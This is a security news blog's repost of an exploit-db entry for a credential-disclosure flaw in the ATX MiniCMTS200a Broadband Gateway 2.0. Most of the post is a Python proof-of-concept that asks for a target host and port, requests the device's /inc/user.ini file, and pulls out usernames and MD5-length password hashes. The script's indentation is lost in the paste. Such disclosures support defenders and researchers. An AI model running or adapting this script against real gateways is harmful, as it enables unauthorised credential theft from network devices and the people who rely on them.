Saturday, April 1, 2023
Latest:

RealinfoSec.Net

InfoSec News, Cybersecurity Awareness

Vulnerabilities 

ATX MiniCMTS200a Broadband Gateway 2.0 – Credential Disclosure Exploit

RiSec.n0tst3 0 Comments atx miniCMTS200a, atx miniCMTS200a credential disclosure exploit, atx miniCMTS200a exploit, credential disclosure exploit, exploit-db, hardware exploit

Date: 2020-11-30

CVE: N/A

Platform: WIN

# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure
# Exploit Author: Zagros Bingol
# Vendor Homepage: http://www.atx.com
# Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/
# Version: 2.0 and earlier
# Tested on: Debian 10 64bit

-------------------------------------

Endpoint:
http://www.ip/domain.com/inc/user.ini

--------------------------------------

Proof-of-Concept:

#!/usr/bin/python3
#License: GNU General Public license v3.0
#Author: Zagros Bingol(Zagrosbingol@outlook.com)


import requests
import re

target = input("Target(ex:http://host): \n")
port = input("Port: \n")


def sploit(target, port):
print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 -
Credential Disclosure\n")
r = requests.post(target + ":" + port + '/inc/user.ini')
searching = re.findall(r"\[.{1,8}\]", str(r.text))
print("Usernames:\n")
print(", ".join(searching).replace("[", "").replace("]", ""))

def hash():
r = requests.post(target + '/inc/user.ini')
searching = re.findall(r"([a-fA-F\d]{32})", str(r.text))
print("Hashes:\n")
print(", ".join(searching).replace("[", "").replace("]", ""))
hash()

sploit(target, port)
Bookmark
Social Comments Box
Connect
RiSec.n0tst3
Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK.

I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated...

I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK.

I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!
Connect
Latest posts by RiSec.n0tst3 (see all)
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution

RiSec.n0tst3

Hello! I'm Steve, an independent security researcher, and analyst from Scotland, UK. I've had an avid interest in Computers, Technology and Security since my early teens. 20 years on, and, it's a whole lot more complicated... I've assisted Governments, Individuals and Organizations throughout the world. Including; US DOJ, NHS UK, GOV UK. I'll often reblog infosec-related articles that I find interesting. On the RiSec website, You'll also find a variety of write-ups, tutorials and much more!

You May Also Like

vulnerability

Android Security Tool APKLeaks releases patch for RCE critical vulnerability

RiSec.n0tst3 0

libupnp 1.6.18 – Stack-based buffer overflow (DoS)Denial Of Service Exploit

RiSec.n0tst3 0

High-Severity RCE Security Bug Reported in Apache Cassandra Database Software

RiSec.n0tst3 0

Leave a Reply

Your email address will not be published. Required fields are marked *